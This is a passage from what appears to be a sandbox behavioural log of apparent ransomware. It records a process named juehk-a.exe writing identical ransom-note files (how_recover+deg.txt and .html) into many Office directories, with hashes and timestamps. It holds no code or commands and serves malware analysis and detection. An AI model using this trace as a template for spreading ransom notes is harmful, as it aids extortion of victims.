- apicall:
- timestamp: 78296
- repeat: 3000
- sequenceNumber: 1310
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 78309
- mode: created
- sequenceNumber: 1311
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSMUX.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521236
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78317
- mode: close
- sequenceNumber: 1312
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\OSMUX.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521236
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78369
- mode: created
- sequenceNumber: 1313
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Outlook.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521237
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78376
- mode: close
- sequenceNumber: 1314
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Outlook.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521237
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78384
- mode: created
- sequenceNumber: 1315
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Outlook.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521238
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78391
- mode: close
- sequenceNumber: 1316
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Outlook.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521238
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78427
- mode: created
- sequenceNumber: 1317
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PowerPoint.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521239
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78435
- mode: close
- sequenceNumber: 1318
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PowerPoint.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521239
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78532
- mode: created
- sequenceNumber: 1319
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PowerPoint.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521240
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78539
- mode: close
- sequenceNumber: 1320
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PowerPoint.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521240
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78549
- mode: created
- sequenceNumber: 1321
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.en\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521241
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78557
- mode: close
- sequenceNumber: 1322
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.en\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521241
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78564
- mode: created
- sequenceNumber: 1323
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.en\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521242
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78571
- mode: close
- sequenceNumber: 1324
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.en\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521242
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78579
- mode: created
- sequenceNumber: 1325
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.es\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521243
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78586
- mode: close
- sequenceNumber: 1326
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.es\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521243
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78710
- mode: created
- sequenceNumber: 1327
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.es\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521244
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78716
- mode: close
- sequenceNumber: 1328
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.es\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521244
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78724
- mode: created
- sequenceNumber: 1329
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.fr\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521245
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78731
- mode: close
- sequenceNumber: 1330
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.fr\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521245
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78738
- mode: created
- sequenceNumber: 1331
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.fr\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521246
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78749
- mode: close
- sequenceNumber: 1332
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.fr\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521246
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78754
- mode: created
- sequenceNumber: 1333
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proofing.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521247
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78759
- mode: close
- sequenceNumber: 1334
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proofing.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521247
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78771
- mode: created
- sequenceNumber: 1335
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proofing.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521248
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78777
- mode: close
- sequenceNumber: 1336
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proofing.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521248
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78786
- mode: created
- sequenceNumber: 1337
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PROPLUSR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521249
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78790
- mode: close
- sequenceNumber: 1338
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PROPLUSR\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521249
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78801
- mode: created
- sequenceNumber: 1339
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PROPLUSR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521250
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78805
- mode: close
- sequenceNumber: 1340
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PROPLUSR\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521250
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78832
- mode: created
- sequenceNumber: 1341
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Publisher.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521251
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78838
- mode: close
- sequenceNumber: 1342
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Publisher.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521251
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78854
- mode: created
- sequenceNumber: 1343
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Publisher.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521252
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78860
- mode: close
- sequenceNumber: 1344
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Publisher.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521252
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78869
- mode: created
- sequenceNumber: 1345
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Word.en-us\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521253
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78873
- mode: close
- sequenceNumber: 1346
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Word.en-us\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521253
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78891
- mode: created
- sequenceNumber: 1347
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Word.en-us\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521254
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78931
- mode: close
- sequenceNumber: 1348
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Word.en-us\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521254
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78940
- mode: created
- sequenceNumber: 1349
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521255
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78947
- mode: close
- sequenceNumber: 1350
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521255
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 78967
- mode: created
- sequenceNumber: 1351
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521256
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 78978
- mode: close
- sequenceNumber: 1352
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521256
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79004
- mode: created
- sequenceNumber: 1353
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1970324837057029
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79009
- mode: close
- sequenceNumber: 1354
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1970324837057029
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79017
- mode: created
- sequenceNumber: 1355
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521257
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79023
- mode: close
- sequenceNumber: 1356
- value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521257
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79030
- mode: created
- sequenceNumber: 1357
- value: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521258
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79037
- mode: close
- sequenceNumber: 1358
- value: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521258
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79044
- mode: created
- sequenceNumber: 1359
- value: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521259
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79050
- mode: close
- sequenceNumber: 1360
- value: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521259
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79057
- mode: created
- sequenceNumber: 1361
- value: C:\Program Files\Common Files\Microsoft Shared\PROOF\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521260
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79062
- mode: close
- sequenceNumber: 1362
- value: C:\Program Files\Common Files\Microsoft Shared\PROOF\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521260
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79070
- mode: created
- sequenceNumber: 1363
- value: C:\Program Files\Common Files\Microsoft Shared\PROOF\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521261
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79076
- mode: close
- sequenceNumber: 1364
- value: C:\Program Files\Common Files\Microsoft Shared\PROOF\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521261
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79106
- mode: created
- sequenceNumber: 1365
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\1033\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521262
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79111
- mode: close
- sequenceNumber: 1366
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\1033\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521262
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79174
- mode: created
- sequenceNumber: 1367
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\1033\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521263
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79184
- mode: close
- sequenceNumber: 1368
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\1033\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521263
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 79189
- mode: created
- sequenceNumber: 1369
- value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521264
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 79194
- mode: close
- sequenceNumber: 1370
